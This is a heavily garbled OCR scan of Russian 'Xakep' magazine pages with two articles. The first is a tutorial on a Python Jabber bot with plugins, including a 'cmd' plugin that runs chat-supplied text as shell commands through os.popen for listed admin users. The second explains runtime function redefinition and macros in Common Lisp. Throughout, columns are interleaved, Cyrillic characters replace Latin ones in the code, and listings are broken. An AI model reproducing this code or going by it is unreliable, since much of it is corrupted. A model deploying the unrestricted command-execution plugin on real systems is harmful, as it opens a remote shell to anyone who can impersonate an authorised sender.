качестве параметров секцию и имя параметра. только методом научноготыкаl.
Рассмотри,~ зтуфункцию:
j id = хтрр. JID (config l ' login' ] )
def loadConfig () :
(jid.
import СопfigРаrsеr
config = \
Чтобы иметь полный контроль над ботом в
любой точке проrраммы [и в главном цикле, и в
соппесt' , плагинахl, мы будеf~ передавать Hall.l. объект bot
повсеместно. Но ведь конфиг, СПИСОК плагинов
идругая служебная информация также может
, password ' ) по надобиться (например, плаrину help нужно
знать, какие плагиныустановлены)? Да. и
поэтому В объектЬоt мы сохраним всю интерес­
'allow.J)assword') ную инфу. Так, конфигсохраним строкой:
user_no_pass = config .get (
permission 1, usеr_по-раss 1)
1 I bot.. config = config
usеr_по_раss = \
f '} Можно законектиться и пройти аутентифика­
цию:
bot.. соппесс ( )
'al1ow_password' :allow_password, bot.auth(jid.getNode() ,
'usеr_по-раss l :usеr_по-раss) bot.config[ 'раss<юrd' J)
Эдесь МЫ читаем переменнуюсо списком Прием сообщения в хтррру реализуется
юзеров, которым разрешен доступ в админку, через привязкуфункции К событию прихода
и превращаем В список методом 5plit по за­ сообщения. Сначала нужно создать функцию,
пятой как разделителю. Далее все пара метры к примеру, message, а потом, методом bot.
мы возвращаем упакованными В ассоциа­ Rеgl5tегНапd ler зарегистрировать ее'
тивный массив (на языке Питона - словарь].
Теперь конфиг можно прочитать: bot.RegisterHandler('message' ,
message)
config = lоаdСопfig{)
Теперь в цикле необходимо вызвать bot.
Process[1), который принимает входящие
­
ПРОЕКТ JABBER
Jabber-сисrема MrHoBeHHoro обмена сообщениями и информацией о uрисyr(:твии
на основе ollipblToro uротокола ХМРР. Проект был основанДжереми МИJUIером в начале
1998 года и стартовал С разработки сервераjabberd. В настоящий момент есть некото­
рая неuонятность в отношении терминовjаЬЬеr и хтрр. Даже в английской Википедии
cjabbel' стоит uереадресация на хтрр. Эта непонятка в первую очередь связана с тем,
что под именем хmрр uротокол был стандартизирован в ШТЕ Каждый uользователь в
джаббер-сети имеет уникальный идентификатор -Jabber ID (сокращенно ЛD). Адрес
ЛD содержит имя пользователя идоменное имя сервера, на котором зареrnстрирован
пользователь. Подобно адресу электронной почты, они разделены знаком@. Пользо­
ватель может иметь одновременно несколько подюпочений, для различения которых
используется дополнительное значепие ЛD, называемое «ресурсом» И добавляемое через
<:леш вконецадреса.!{ uримеру, пусть полный адрес пользователя будет lIser@example.
com/work, тоrда сообщения, носланные на адрес usеr@ехаmрlе.соm,доЙдyrнауказан­
ный адрес вне зависимости от имени ресурса, но сообщения для user@example.com/work
дойдут только при соответствующем ПОДJUIЮченном ресурсе!
~ 093
 1'" I
-+++
» cod;ng
INTER~~ET

ССЫЛКИ
ПОД,РОБН'ЕЕ ULIE

НАОБЪЕКТЫ
охмРРРу ,
\

И ПЕРЕМЕН'НЫЕ
Библиотека хтррру содержит мпого полезных объектов,

\11
в Питоне (да и в другихязыках, например,в РНР) , есть один
Рассмотрим некоторые из них.

.'

юоанс, про который часто забывают_ Рассмотрим прнмер раБоты
Объект JID ДЦЯработыс Jabber т. При создапиипринимает

сперемеииыми: параметр-JаЬЬеr-идеитификатор.

Методы:

a~1;b=a;b=2
• gеrDоmaiп, возвращает домен;
ргiпt а #1
• getNode, возвращаем имя пользователя;
print Ь #2
• getResource, возвращает ресурс.

Ои выведетна экран 1, потом 2, и это закономерно. А что, если главный объект Client. При созданиипринимаетдомеп
перемен.иая будет в объекте? Посмотрим: джаббер-сервераи перемеинуюДJIЯ отладочнойинформации,
Методы:

class Obj () :
• сопnесt, подключеиие к серверу;
def _init_(self) :
• auth, авторизация,припимаетпараметры: имя пользователяИ
pass
пароль;

--+++ • RеgistеrНапdlеr, привязкафункцнй к событиям, принимает

а = Obj{); a.var = 1; Ь = а; b.var' = 2 параметры тип события(mеssаgе, рrеsепсе, iq) и имя фУНКЦИИ;
• sепd1пitРrеsепсс, отправка начальных запросов, нужно запу­
pr'int а. var #2
скатьпосле авторизации;

-+++ print Ь. var n2

• sепd, отправка сообщений, принимает объект Message;
• Process, запустить обработку входных сообщений;
Сюрпрпз! На экран выводятся сплошные двойки! А случает­ • disconnect, отключиться от сервера.
ся это потому, что операция «=" при работе с объектами не
--+++ копирует их, как при других типах переменных, а создает Message- объектсообщения.Прпнпмаетпараметры- имя

ссылку. юзера И текст сообщения,

В контексте нашего прпмера ЭТО означает, что переменную Методы:

bot мы обычно передаваликак бы по значению, а на самом • getBody, возвращает текст сообщения;

--+++ деле - как ссылку, • getFTom, возвращает имя пользователя, от кого сообщение,

сообщеf1ИЯ и обрабатываетих Разумеется. веЧf1ЫЙ цикл здесь bot . оп1 ine = 1

f1e нужен. поэтому в свойстве опllпе смело запишем единичку. и ,.,hi1e bat, on1ine:
-+++ будем крутить цикл дотех пор. пока эта единичка f1e изменит свое bot, Pr'ocess (1)
Зf1ачеf1ие; bot.disconnect()

-+++

ПIРОЦЕДУРАОБРА'БОТК~

--+++ ВХОДЯЩИХСООБЩЕНИИ

def message(conn,mess) : #Достаем !~Я пользователя

globa1 bot user = filess. getFrom ( )

--+ ++ text = mess. getBody ( ) user = str (user-) . sp1iL (' /')
#если сообщение служебное - выходим \1ser' = \lser [О]
if ( text == None ) :

return
iFЕсли юзер не адиин - говорим «команды нет).)

-+++ if \lser' поt in bot.config[ 'user_nO""pass'];

Из вхоцящего сообщения достаем команду text = "wI'ong соmшапд. try 'help'"
command ~ text.sp1it ( .. )
bot. send (хтрр .Message (filess. getFrom () ,text) )
command = command [ О]
геtuсп

"'Г+++
liесли команда в списке nyбличных - запускаем #Если ::<;.оманда есть в «админских»

if command inbot. p1ugins [ 'public_comrnands' ) : i f command iп bot, p1ugins [ , comrnands' ] :

#Запускаем команду гuПРl\lgiп(command, bot. mess)
+++ r\lnPlugin (command, bol: .mess)
else:
ret\lrn
text = "wrong соrпmапд. (ГУ 'help'"
bot.send(xmpp,Message(mess,getFrom() .text»)

.~ 094 ХАКЕР 06 /126/ 09

 » cod;ng

I
I
~
U1.Л:
\
.. I><,.. ,.:.н.,
.~~
\
··(..·,.".1'·"
\
\

'lI-! i

.
.........,.....~ .;.",...... <;~~,; ь..-­
l

-1 I
:~ rr~~~ i§;~:;i:~::'[!:,T:7:~::, Ё@
'~.E
! .. о

i O'REILLY' еУР080ЕПИТОН08еКОЕЛОГО
КНИГА ПО ДЖАББЕРУ NET8EANS - ОТЛИЧНАЯ IDE
ДЛЯ PYTHON

Для остановки бота нам будет достаточно изменить 1 на О. imporc хтрр

8 результате, он корректно отсоединится от сервера и за­

вершитсвою работу. def init () :

KorAa наш бот запущен. мы можем вернуться к написанию return О

фУНКЦИИ обработки входящих сообщений. Простейший

вариант. способный принимать сообщение и реагироватьна def run(bot,mess}:

сей знаменательный факт. выглядит примерно так: bot. send(xmpp.Message (mess.getFrom() ,

~ ]lnks
rneSS.getBody() )
xmpppy.sollГceforg~.
def message(COnn,mess):
net - сайт библиоте­
global bot
Напишем функцию,загружающую наши плагины. Поскольку ки хтррру.

if (шеss. getвody () == None ) :

мы уже решили. что ОНИ ДОЛЖНЫ находиться В папке рlugiпs. то
rеtUП1 взтом каталоге нам придется поместитьnустоЙфаЙл_iпit_.ру
- та ково требование Питона. Это шаманское действо позволит
bot.send{ нам ИМПОРТИР08атьфайлы как модульфункциеЙ_imрогt_.
хтрр. Message (mess . getFrorn () , 'helJ.o' ) ) Итак. нам нужно загрузить все файлы. размещенные В папке
plugins !кроме _init_.pyJ в какую-то nеременную.Кроме
В гlачале этого участка кода мы командой «global bot» по­ того, во время инициализациимы создадимдва списка,

лучаем доступ к объеК1у нашего бота. Далее идет обработка которые будутсодержать реестр загруженного.В первом
входящего сообщения, где с помощью команды mess. (public_commands) будут nеречисленыте плагины, которые
getBodYMbI получаем сообщение. Если входящее сообщение можно запуститьбез авториэации.а во втором Icommandsl ~ dvd
равно None. это означает, что пришла служебная команда - элитные (тру. VIP] - админсхие плагины. В качестве ре­ • На диске ты
(допустим. про то, что юзер что-то нам печатает). Такие со­ зультата работы функция вернет нам ассоциативный массив найдешь полные ис­
общения мы обрабатывать не настроены, и реакция на них с nлагинами и списками: ходники бота.
однозначна - выход изфункции.
В следующей части Марлезонского балета мы воспользу­ def 10adPlugins():
• Видео. иллюстриру­
емся методом send, отправив в отее1' простое сообщение. import ОБ
ющее работу с ботом.
Этот метод в качестве параметра принимает объект Message commands = []
ждет тебя та м же ­
библиотеки хтррру. При ее создании мы передаем два пара­ public_commands = []
на нашем DVD
метра' первый - кому нужно отправить сообщения, а

второй - текст сообщения. #Пере6ираем :е:с:е файл 1 ИЗ пar:RИ plugi:os

for fname . n os. listdir ( 'plugins/ ' ) :
ПЛАГИНЫ #ЕсJТИ файл заканчизгется H<:J '. ру'

Простая поддержка плагиноо реализована в самой j f fname. endSNi th ( , . ру' ) :

библиотеке хтррру. но мы сделаем ее по-своему. написав

собственную архитектуру плагинов (как минимум. с блэкдже­ ~Обрезае~1 последние 3 буi:ВЫ

KOM!I. Сначала определимся со структурой плагина. Каждый plugin_narne = Еnаrnе! :-3]

плагин будет иметь название. аналогичное исполняемой tfЕслJ.1 и.ня файла не '_init__
1
им команде. К примеру, если мы хотим создать nлагин, i Е plugin_name ! = '_ini t_· :
который на команду «echo some text» посылает сообщение
с зтим же текстом, то плагин должен будет называться echo :#Загружаен nлаrи..i-f в :1ереыенную

и раэмещаться в файл echo.py в каталоге plugins. В каждом pl\.1gins = _irnport_( 'plugins.' +

nлагинедолжнысодержатьсядве функции. Одна. iпit, может plugin_name}
проводитьнекую предварительнуюинициализациюи обяза­
тельно возвращать 1. если плагин можно использоватьлишь ~ДостаеN. ппdг:и"':-: с Г!ере:-!е ~НОЙ
админам, и О, если всем юзерам. Вторая же обюательная plugin = getattr (plugins, plugin_name)
функция - run - s качестве входного параметра принимает
ссылку на наш бот и оходящее сообщение. К примеру, плагин
есtю EJыглядиттак: i f plugin.init():

ХАКЕР 06 /126/ 09 ~ 095

 1'"

+++
>> ,::oding

INTERNET

,
MONTAGUE
.NET

commands. append (plugin_name)

I -------

ОБРАБОТКАСООБЩЕНИЙ
F::-~

else: Осталось изме~IИТЬ функцию me55age, которая обрабатывает входящие

public_commands.append(plugin_name} сообщения. Логика ее ра боты та кова:
• Выделяем из входящего сообщения команду [символы от начала до
#Во:?вращаем аССО~Иа'1'ианый словарь пробелаl,
return • Смотрим fiаличие команды в списке «публичных»,
'plugins' :pl1.1gins, • Если к публичным ofia не относится, стало быть - про­
rСОйLmаnds' ;con~ndSt веряем авторизацию и факт наличия команды в списке

,-+++
'Р1.1Ы iс_сопunапds' :publ iс_соmшапds «админских»

• Если команда нашлась, то запускаем ее. 8 противном случае­

сообщаем юзеру о прискорбfiОМ факте отсутствия кома:,ды в fiаших
списках.

Кстати, рассмотрим ОДИfi момент Имя польэователя, которое

«ЗАДАЧА ПОСТАВЛЕНА: возвращает команда me5s.getFromlJ, не всегда возвратит
праВИЛЬfiое значение Ic точки эрения проверки авторизации).
НАПИСАТЬД>КАББЕР-БОТ, Почему? Ведь там может быть имя ресурса feмотри врезку про
Джаббер). которое нам не НУЖfiО. Стало быть, ресурс мы должны
СПОСОБНЫЙ ПРИНИМАТЬ обрезать, например, вызвав метод строки splitU') и потом взять
первый элемент списка. Полностью функцию смотри на соот­
И ИСПОЛНЯТЬ КОМАНДЫ. ветствующей врезке,

-+++
НЕТ, ЭТО СЛИШКОМ просто. ИСПОЛНЕНИЕ КОМАНД
Ну, вот и настало время закодить «виновника торжества» - плаГИfi, ис­
УСЛОЖНИМ ВСЕ И НАПИШЕМ полняющий системные команды. Наречен он будет говорящим именем

. - +++ «cmd», а ПРИfiЦИП его работы будеттаков:

ПОЛНОЦЕННЫЙ БОТ • Обрезаем первые 4 символа входящего сообщения [к примеру,
cmd ls ~ l5).
С ПОДДЕРЖКОЙ ПЛАГИНОВ, • Передаем команду в цепочкуфункций 05.рореп[сmd] read(l.
,-+++ • Получен fibI й резул ьтат кон вертируем Iпри fiеоБХОДИМОС1"иJ в utf-8lпри
ОДИН ИЗ КОТОРЫХ инициализации бота мы не указывали кодировку, поумолчаниюэто будет
UNICODE].
И БУДЕТ РЕШАТЬ ЗАДАЧУ • Возвращаем пользователю результат.

1+++ АДМИНИСТРИРОВАНИЯ».
Вот как это выглядит в строках сурового программного кода:

imporl. хтрр

Эта фУfiКЦИЯ важна длй пони мания работы Питона в плаfiе загрузки import 08

.-+++ плаГИfiОВ «fia лету" - советую подробfiО в ней разобратьсй. После

загрузки в перемеfiНУЮ рltJgiП5 плаГИfiа, его оттуда МОЖfiО BbIH1fiYTb def ini t () :
функцией getattr с указанием в первом параметре имеfiИ пере­ relurn 1
меНfiОЙ, где хранятсй плагины, а во втором параметре - имени

[-+++ плагина. В результате, функция возвращает сам плаГИfi, из которого

уже потом можно вызывать функции, в нем fiаходящиеся. К примеру,
def
cmd =
ruп(Ьоt,щеss):

тевв . getBcdy ( )
В вышеуказаfiНОЙ фУfiКЦИИ загрузки мы запускаем для каждого из ста = сщd[4:]
них фУfiКЦИЮ mit_ В зависимости от результата имя плагина добав­
,-+ ++ лйем или В список РUЫIC_соmmапds, или в commands. НаписаfiНУЮ o1.1tp1.1t = ОВ.рореп(стСО .read()
загрузку плагинов можно заюзать И при этом записатьрезультатв соот­

ветствующеесвойство бота: if по!: isinstance(output, UТlicode),

output = unicode (OtltP1.1t, '1.1tf-8' ,'ignore')

,-+++ bot.pl1.1gins = loadPlugins()
bot. send(xmpp,Message (mess.getFrom{) ,Otltp1.1t))
Чтобы вызвать наш плагин, fiапишем малеfiЬКУЮфункцию, которая будет
принимать имя KOMafiAbI, ссылку fia бота и входящее сообщение: HAPPYEND
i-+++ На этом разра ботку бота МОЖfiО считать завершеfiНОЙ.
def пшРlugiп (соrnrl1зпd,Ьоt ,mess) : Мы реализовали все. что хотели, оставив задел для неогра­

plugin = getattr (bot. pl1.\gins [ 'plugins' ) ,cornr'1and) ничеНfiОГО расширения функционала при помощи плаГИНО8.

plugin.run(bot,mess) На диске. кроме вышеперечислеfiНЫХплагинов, содержатся и

+++ плагины бонусные. А чтобы продемонстрироватьзапуск и работу

Эта фУfiКЦИЯ, исходя из имени плагина Iпараметр commandl, вытаскива­ готового бота, я записал видео. Если что-то будет непонятно­
ет его из bot.plugln5[·plugin5'] и запускает функцию run. спрашивай! I

j-+++ ~ 096 ХАКЕР 06 1126/09

 ~

» c:oding

cons а 3)) ; (43 (f~ '"1

(setq а 43]
defun two-funs [х)

[List а [cons а 3JJ ; [43 [43. 3J]

[function (lambda [\
'1
[setq funs [two-fun"
[list [quote а) [quote (cOliS а 3)) ; [а (cons а 3]] [funcaLl (carfuns))

[funcall [cadr funs! ~

LINKFlY

/ HYТPr!lL'NKFLY.RU /

ffuncall [carfuns]] 1Ii;~;4;Jii=;;;

--+++ "
ТАИНЫ

БЕССМЕРТИЯ LISP (а)

(отто" Lisp: музейный экспонат или мощное средство

+++ создания ИНlтеллектуального софта?

Сегодня мы попробуем взорвать твой мозгторжественным раскрыти­

ем тайны бессмертия языка «Lisp». Ты узнаешь, что за штуку придумал
Джон Маккарти [тогдашний «Эйнштейн» мира программирования]
-.+++
В1958 году, почему эта «штука» не планирует подвергатьсязабвению
и кто такие странные существа - «Лисперы».

+++
ИЗСЕТИ для символьных вычислений, а значит, для лить во время выполнения программы. Да,
«Адепты Лиспа - головная больлюдей в разработки экспертных систем и других именно так: программа может быть сгенери­

+++ белых халатах?" Подобный вопрос порой за­ АI-приложений Разумеется, для разработки рована во время выполнения l Кроме того, ты

даютте, кому приходилось с ними [адептами) аеб-приложениЙ.приложениЙ,взаимо­ можешь переопределить уже определенные

контактировать. Вот, например, высказывание действующих с базами данных, и прочего функции, то есть, язык позволяет писать

одного из модераторов форума известного общественно-полезногостаффа он также самоизменяемые программы без исполь­

+++ ресурса Illlp:lirsdn.ru: «Функциональные используется. зования ассемблера. Все эти манипуляции
языки в целом и Лисп в частности собрали Одно из многих положительных качеств Лиспа можно производить и В «докомпиляционной"
вокругсебя много откровенноневыдержанной - его максимально аскетичный синтаксис. стадии, что очень способствует построению

и фанатичной публики». Чтож. приобщимся к Два основных правила таковы: оптимизированных программ. Для более

+ ++ их знаниям. 1.Твоя программа,а конкретно - вызов функ­ основательного ознакш~ления С фичами

ции, должна быть заключена в скобки: языка весьма рекомендую зайти на один из

ТЕОРИЯ. СКАЖИ «НЕТ» Например: Iтвоя_программа параметр'l лучших ресурсов по основам Лиспа: b.11QJ!.
СИНТАКСИIЧЕСКОМУ параметр2 .. параметрNJ. pcl.catap.ru, там находится переведенная на
РАЗВРАТУ! 2. На месте пара метра может быть вызов
русский язык книга "ПрактическийСогnmоп
Сразууточню,что под термином «Лисп» В другой функции, и ее результат будет счи­
Lisp" Питера Сейбеля.
статье подразумеваетсядиалект«Согnrnоп таться параметром: (твоя_программа (+ 12)

LISp» [тем не менее, очень многое с небольши­ параметр2J.

ПОДГОТОВКА
+++ ми оговорками применимо и к диалекту Лиспа
ИНСТРУМЕНТОВ
«5cheme»J. На сегодняшний день [если не
говорить о языках общего назначения
и AutoLlspNisualLispl в широком употребле­
В Лиспе реализовано множество свойств,
которые создатели других языков не устают Для начала скачаем бесплатнуюверсию про­
- ELisp черпать, постепенно превращая свои языки В стенькой Лисп-системыLispWorks, которая
Лисп. Одно из них - ато использование функ­ поджидает любого начинающего эксперимен­

+++ нии осталисьтолько эти два диалекта. циональных объектов В качестве параме­ татора на "vvvw.lisgWDгks.соrn/dО\ЛlПlоаds.
Итак, что же зто за эверь - Lisp? Это язык тров функции ты можешь передавать другие Чтоты говоришь? Не желаешь пользоваться
общего назначения, особенно удобный функции, которые, кстати, возможно опреде­ «простенькой системой»? Желаешь иметь

+++ ~ 098, ХАКЕР 06/126/09

 i

» coding

в своем распоряжении набор «кнопочек, Епtег и смотри результат вычисления В ответе

пимпочек» и всякой подобной ерунды для «LISP - КРАЙНЕ интерn ретатора.

построения GUI? Легкоl По адресу hllidL

fгапz,соm/dоwпlоаds тебя ждет Лисп-система ИНТЕРЕСНАЯ ПРАКТИКА.
«Аllеgго CL 8.1 Fгее Ехргеss Еditiоп». Сей агре­ ПЕРЕОПРЕДЕЛЯЕМ ОДИН
гатпредставляет собой бесплатную редакцию ШТУКА. ТРЕБУЕТ, ИЗ МЕХАНИЗМОВ ЛИСПА
платной системы; здесь содержится все не­ Итак, чтобы лучше понять суть, создадим
обходимое - и GUI-кОНСТруктОр, И генерация КОНЕЧНО, ПОЛНОГО необходимый контекст для дальнейшего

ехе-шников. изложения. Допустим, нам нужно создать

Обе системы ставятся на Windows, Linux, ПЕРЕОСМЫСЛЕНИЯ какую-либо рекурсивную функцию. В качестве
MacOS, FreeBSD [оцени масштабы). Повоз­ примера у нас выступитфункция вычисления
ившись с бесплатными версиями, тебе нужно ЖИЗНЕННОГО ПУТИ факториала:

будет решить: отдаватьли свои кровные за

полноценные редакции? Например, на мо­ И ПОГРУЖЕНИЯ (деЕип factoria1(x)
мент написания статьи самая дешевая версия (if (zerop х)

LispWorks [для коммерческогоиспользо­ В ИЗНАЧАЛЬНОЕ 1

вания) стоила $1500. Но не стоит впадать в (* х (factoria1 (1- х)))))

панику [а лишь ощути серьезность и мощь от­ ДАО, НО ВСЕ-ТАКИ не СТОИТ заниматься подсчетом

раслиl- существуют и полностью бесплатные скобок, среда програнмированияЭТо

альтернативы, причем, весьма качественные. ИНТЕРЕСНАЯ». сделает за нас :)

Если ты заядлый «виндузятник», - тебе нужно > Еас

to.C ia1

раздобыть nлагин для Eclipse, включающий сколько основательно разработчики подошли (factoria1 5) ; про верка

в себя Лисп-систему SBCL, под названи­ к вопросу переносимости. Вот, например, > 120

ем "CUSP", по адресу: httg:l/bitfaLJna.com/

projects/CLJ5p. Кстати о SBCL. Скачать ее мож­
список архитектур, на которые они ориентиру­

ются; Х86, АМD64, РРС, А теперь представимсебе, что необходимо

но с httр:l/www.sЬсl.огg/рlаtfогm-tаЫе.html.
Сходить по этой ссылке я советую в любом
случае, хотя бы для того, чтобы посмотреть, на­
I
i
SPARC, Alptla, MIPSbe,
М IPSle. А что насчет операционных систем? эту функциональность!Функциональный
Списоктакже внушает почтение: LinLJx, объект) связать с другим символом. В смысле, I
Dагwiп!Мас OS Х], Sоlапs, FгееВSD, NetBSD,
OpenBSD, Windows. Впечатляет, не правда
не конкретно именно зту функциональность,

а вообще, какую-либофункциональность, ,
ли? Ноучти, что под неистребимый Windows определеннуюранее и связанную с каким­

ДЕСЯТЬ
портированиееще не завершено [причем,
только под архитектурух861. Главное, чего
либо символом, Зачем? ЭТО во многом зависит
от нашей фантазии, Сможем найти смысл в
I
возможности переназначатьфункциональный
РЕЦЕПТОВ
пока нет в Wlпdоws-версии, - многопоточно­
сти. Все остальное должно работать на «ура», объект, эначит, будем использовать;если нет,

- ну значит не судьба,
ЭЛИI<СИРА
хотя я, помнится, так и не смог побороть глюк
библиотеки ASDF-INSTALL, предназначен­ И все-таки, чем бы нам это могло помочь?

ВЕЧНОЙ
ной для загрузки и компиляции библиотек из Допустим, у нас есть чужой код, в который нет
общего хранилища Лисп-исходников [смотри времени/желания влезать, но скорректиро­

МОЛОДОСТИ
http://cliki netJ, вать его работу нужно, просто позареэ. Мы

ЛИСПА
L Единообразный и простой синтаксис
добыть модуль к редактору Emacs
Итак, SBCL - это Лисп-система [не среда можем осуществить это следующим образом:
разработкиl, и для экспериментов с Соmmоп 1, Ввести в систему новый символ kкажем, 'ВI
Lisp' ом ее может быть вполне достаточно. и сохранить в нем фун кциональный объект,
Для серьезных разработокя тебе рекомендую связанный с неким символом kкажем, 'А) и
- SLIME, поведение которого требуется скорректиро­

(облегчает генерацию кода макросами),

Самая что ни на есть крутая и бесплатная вать.

2.... Макросы вреivlени компиляции на комбинация - это «EMACS - SLIME - SBCL» 2. Определить новую функцию, которая осу­
самом Лиспе, SLIME можно взять отсюда: httр:l/соmmоп­ ществляет какие-либо нужные нам действия,

;i, Определениеи переопределениефунк­ lisр.пеt/огоjесt/slimе. Если ты хочешь все и дополняющиедействия функционального

ций во время выполнения, сразу, то можешьскачать один из вариантов объекта [связанного с А а теперь еще и с

~ Компиляцияи выполнениекода, сгене­

LispBox здесь: httр:l/соmmоп-lisр.пеt/ргоjесt/ 'В], а также действия этого функционального

рированногов run-time,
lispbox или здесь: http:Ugigamol1keys.com/ объекта (этого самого - связанного с 'А и .8).

5.., Определение языков с синтаксисом под

book/lispbox. При определении этой функции для вызова
задачу, функции изначальной нужно пользоваться

!i.. Огромное количество open-source

ПРАКТИКА. ОСНОВНЫЕ СИ м волом' В. Почему - будет понятно далее.

библиотек (http://cliki,net).
ФУНКЦИИ ЛИСПА 3.Связатьфункционалы~ыЙ объект, пред­

Z. Более гибкая и динамичная, по срав­

После установки и запуска выбранной ставляющий новую функцию, с символом А

нению с другими языками, объектная

Лисп-системы ты увидишь перед собой Поэтому, собственно, для вызова «родной»

система (CLOS),
консоль интерпретатора. Например, в случае функции И нужно было польэоваться новым

~. Возможность модифицировать соб­

LispWorks строка приглашения консоли будет символом 'В, - символ'А теперь будет свюан
ственное ядро, даже во время выполнения, выглядеть так: с функцией, включающей дополнительные

2.. Поддержка практически всех суще­ действия.

ствующих наданный момент парадигм CL-USER 1 > На примере:

программирования,

10, Декларативноеописаниециклических Да, именно сюда тебе и следует вводить вы­ ;Определяем функцию ОТ двух аргу­

алгоритмов(с помощьюформы LOOP), ражения языкаЛисп. Все хозяйство напоми­ ментов

нает UNIX Shell: вводи выражения, нажимай (defun re1ation-is (obj1 obj2)

ХАКЕР 06 /126/ 09
 ++
::-::- c:oding

+++
."'~... ~. - .. ,'k.'.-.. I~·"" _ ,.,....., '0"0'" ,..;.

- ~ ~.-~~~~-: ~~~=~~!
18:1~! ~~ i-:~С:~:::r~.;--~~-~·~~~~~~~~5fЗ_~~_!:_~_~_
~+++
1~ ~ !!:rJ:~~::1::;::~~:;~-~~::::3:~
"1Щii.Оli

r=~-=J
*MIS1
!

:,'
~;:: ­
l!yltt- .~;
!~: ~ --I·f----·-­ ~j}
~::""oe ...
!_
..-I I~r
]:..с '!!.~!!!!III!!~!j~~
.. МIЫ\I1r~LET. НF~jI;tt-,. HIL)
:.
:~
~ ...
..---;,~~:' II (0IИ_
(rIHO-УlItDDV :lpE~C"lL'HIJ*'OIl).)
• 1""' .::
I=.c.. 1~' (Ш «~=i~\I'lI>olt

I
~=-. :,nVII ~fDJl:tI1 11'1N:"frft.oq1.113.1:.15
I C:\O'oC.,,,,,,t.. ~nll Slttt1nSl"'''Jnkl'll_'tto'' I~II
~I<I\,. :0""
j~~_:~~:1IЮ ~~:, tlng.. : 1I1'lt,jII 1. 'plq 1, "P'.~ 1, 40\<!I 1:.

~~--~ ... "-;;,;,;==--·1 ~~~~~;::1f""IНQOII

'••Cr19t:lon IIIf .11 ~'''Pl1.r ~""tch" 1I~\I'jI; t
I\·U","").
n.p~~ •. ~ ,
DLJ
">:'1<­
-:;
~ ~ - - . . .• PNв!))

~I
,. .~(Рош.

ALLE6RO CL 8.1 FREE EXPRESS EDIТlON

(list obj1 'is obj2»

;проверка

(re1ation-is 'cat 'anima1)

>­ (cat is anima1)
; Сохраняем старую версию ФУНКЦИИ
(setf (symbo1-function 'old-relation-is)
(symbo1-function 'relation-is»
;Добавляеl1 Функциональности

{defun re1ation-is (obj1 obj2)

;теперь re1ation-is связан с другой функцией

{list :relation (old-re1ation-is obj1 obj2»)

; проверка нового варианта

(re1ation-is 'cat 'anim(1)

> (:RELAT10N (САТ 1S AN1МAL)

I
Попробуем то же самое провернуть с рекурсивной функцv,ей, в нашем

I~+++ случае - с факторv,алом:

{setf (symbo1-function 'old-factoria1)

; сохраняем старую версию
+++ (symbo1-function 'factoria1»)
(defun factorial (х)

(print х) ;;; Далее код из Листинга 3.

(list (list 'factorial х)

+++ (old-factoria1 х) ) ) Однако всеведущие создатели не позаботились о системной пере мен­

(factoria1 5) ; проверка ной, подобной *lhis*. Это было сделано ради борьбы за ПРОИЗ90дитель­
> Ошибка!!! "1n * of (1 (( 'FACTOR1AL О) 1» ность и, видимо, для стимуляциизрелой самостоятельностив среде
arguments shou1d Ье of type NUMBER .., програм м нстов. Ладно, м ы все сделаем сами.

+++
Как мы видим, при манипулироsании рекурсивными функциями таким (dеfшасго defun-new (name args &body body)

образон возникает проблема. Это происходит из-за того, что при (let (*this*) ;это нужно для создания замыкания

sыполнении изначальной функции В ее недрах происходит не sызоs (defun ,name ,args ,@body)

+++ саной себя, а вызов новой функцv,и, добавляющей функциональности к jнодифицируем заныкаеиое значение

изначальной. Как же забороть эту проблему? (setq *this* (symbo1-function • ,паше»

Ненного подумаем. Нам нужно успешно вызвать в функции саму себя, ; возэращаем символ определенной ф-l1А
причем не функцию, сsязанную С каким-либо символом [так как может • ,name» ;dеfшасго

+++ происходить пере назначение функций), а использовать функцию, ре­ ;Проверка

ально SЫПОЛI~ЯЮЩУЮСЯ в данный момент. Сразу напрашивается вопрос (defun-new f (х) (list х *this*»
- а не предоставляет ли язык нам такую возможность? Какую-нибудь (f 34)
системную переменную ероде 'this', содержащуютекущий, выполняе­ > (34 #<interpreted function F 200О8832»

гf-++ мый функциональныйобъект. Тогда можно было бы сделатьтак:

Как работает сие чудо? Разберем по косточкам:
; Новое определение Факториала

(defun factorial(x)
(шасrоехрапd ' (defun-new f (х) (list х *this*)))
т++ (Н (zerop х)
> (LET (*THIS*)

1
(DEFUN F (Х) (L1ST Х *TНIS*)

(* х (funcal1 *this* (1- х»)))

(SETQ *TH1S*

+++ ~100 ХАКЕР 06 1126/09

 » coding

(symbol-functi.on 'factorial)
(defun factori.al (х)

(pri.nt х) ; какое-либо действие

11ist (list 'factorial х)

(let ({new-factorial
•....' .... ·.J~I (_r."'_U"
, . . . . ( .... <Т ... ' . . ~tl.. ''''''_1) (symbol-function 'factorial»)
"'. ,- "1' =., M~'

I
'M'~'"
'(Jtt\.tII""•• (setf (symbol-function 'factorial) • Всемирная ассо­
(......,.."•••_ , ...:r­ .
!~;;IIoI •• (чllll-.l·'" '{_·,.... ""Н
( ..... "аН1НI а -t~1~.)) (symbol-function 'old-factorial» циация пользова­
(,
'~.H
~)

,...tr. f.M,t.~ ·..r... 1 !_. '....L.Lo. '•• 1••• Н"

(progl телей Лиспа. даже
("'/.00011.)(1'_"
(•• н I"_\-I,,,,~tl... ·.I~#) ••,...\~I.... fi ... "1)
(с.Н . .,_l-'..,сН .. 'П ( ~ (1 (' I "~" ~)1I1
; можно и (factoria.l х) начинающий адепт
'" (old-fa.ctorial х) должен знать зто:

(setf (symbol-fuпсtiоп 'factorial) alu.org.

new-factorial)
·огромныйЛисп­
» ;prog1, let
портал стоннами

(SYMBOL- FUNCTION (QUOTE Р) )) ; list

исходн ого кода:

(QUOTE Р) ) ;defun
common-lisp.nel.
(Eactoria.l 5) ;проверка

Вот в такой вот код разворачивается ма крос defun-new:

1) Функция LET создает локальную связь с символом Теперь добьемсятого, чтобы стандартный процесс опреде­

"THIS". лени~ функций позволял нам пользоватьсяпеременной

2)Далее создается функция с помощью стандартной 'THIS" ДЛЯ этого мы напишем код, подобный определе­
формы DEFUN, в теле которой может использоваТЬС>1за­ нию DEFUN-NEW. но с некоторыми коррективами:
мыкаемое значение локальной переменной "THIS'.
3) Форма (SETQ *THIS' [SYMBOL-FUNCTIQN [QUOTE FJI) ;Сохраняеи текущее значение системной функции

изменяет локальное определение "THIS", а значит, и DEFUN

Файл слистингами

заМblкаемоезначениепеременной в определяемойс по­ (setf (macro-Eunction 'defun-old)

к статье и весь н е­

мощью DEFUN функции. Причем изменяет она его со зна­ (rnacro-function 'defun) обходимый стаффты

